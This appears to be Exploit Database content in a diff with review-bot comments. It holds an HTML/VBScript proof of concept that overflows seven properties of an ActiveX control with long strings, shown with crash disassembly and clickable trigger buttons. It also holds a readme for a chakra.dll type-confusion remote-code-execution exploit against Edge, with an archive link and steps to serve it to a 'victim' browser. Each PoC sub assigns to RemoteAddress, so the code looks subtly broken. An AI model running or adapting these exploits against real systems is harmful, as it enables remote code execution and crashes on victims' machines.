(RemoteAddress,ProxyPrefix,ProxyName,Password,ProxyBypassList,LoginName,CurrentDirectory) suffers from Buffer Overflow when we pass long strings in fact : <br> 1- RemoteAddress suffers from a BoF when we pass a string over 2068 <br> 2- ProxyPrefix suffers from a BoF when we pass a string over 1044 <br> 3- ProxyName suffers from a BoF when we pass a string over 1044 <br> 4- Password suffers from a BoF when we pass a string over 1044 <br> 5- ProxyBypassList suffers from a BoF when we pass a string over 1044 <br> 6- LoginName suffers from a BoF when we pass a string over 1044 <br> 7- CurrentDirectory suffers from a BoF when we pass a string over 1044 <br><br> DisASM RemoteAddress Crash :<br><pre> 7C809EEC MOV AL,[EDX] (KERNEL32.dll) 7C809ED4 TEST EDX,EDX 7C809ED6 JE 7C80C858 7C809EDC LEA EDI,[EDX+EAX-1] 7C809EE0 CMP EDI,EDX 7C809EE2 JB 7C80C858 7C809EE8 AND DWORD PTR [EBP-4],0 7C809EEC MOV AL,[EDX] <--- CRASH EBP+8 FEEEFEEE Stack Dump: 13FC18 A7 F3 01 66 EE FE EE FE 04 00 00 00 02 00 00 00 </pre> <script language='vbscript'> Sub 
RemoteAddress arg1=String(2068, "A") beard.RemoteAddress = arg1 End Sub Sub ProxyPrefix arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub ProxyName arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub Password arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub ProxyBypassList arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub LoginName arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub CurrentDirectory arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub </script><br><br> <INPUT TYPE="button" VALUE="RemoteAddress PoC" ONCLICK=RemoteAddress()> <INPUT TYPE="button" VALUE="ProxyPrefix PoC" ONCLICK=ProxyPrefix()> <INPUT TYPE="button" VALUE="ProxyName PoC" ONCLICK=ProxyName()> <INPUT TYPE="button" VALUE="Password PoC" ONCLICK=Password()> <INPUT TYPE="button" VALUE="ProxyBypassList PoC" ONCLICK=ProxyBypassList()> <INPUT TYPE="button" VALUE="LoginName PoC" ONCLICK=LoginName()> <INPUT TYPE="button" VALUE="CurrentDirectory PoC" ONCLICK=CurrentDirectory()><br><br> Brought to You by Bl@ckbe@rD<br> Peace xD </BODY> </HTML>
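Review bot: this deletion removes the copy that carries the advisory reference (source: http://www.securityfocus.com/bid/32814/info) and the affected-context statement about the ActiveX host. If the file is being dropped as a duplicate of the remaining EvansFTP entry, confirm that entry records the same BID reference, or add it there in this commit so the cross-reference is not lost.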


@ -0,0 +1,20 @@
Source: https://github.com/theori-io/chakra-2016-11
Proofs of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40990.zip
chakra.dll Info Leak + Type Confusion for RCE
Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201)
Tested on Windows 10 Edge (modern.ie stable).
FillFromPrototypes_TypeConfusion.html: WinExec notepad.exe
FillFromPrototypes_TypeConfusion_NoSC.html: 0xcc (INT 3)
To run:
Download exploit/FillFromPrototypes_TypeConfusion.html to a directory.
Serve the directory using a webserver (or python's simple HTTP server).
Browse with a victim IE to FillFromPrototypes_TypeConfusion.html.
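Review bot: the "Proofs of Concept" line links 40990.zip through a raw/master URL, which is a moving branch reference to a binary archive with no digest recorded beside it. Pin the link to a commit and add the archive's SHA-256 to this file so that consumers can verify what they fetched. Separately, the text says "Tested on Windows 10 Edge" while the last run step says "victim IE"; align the browser name.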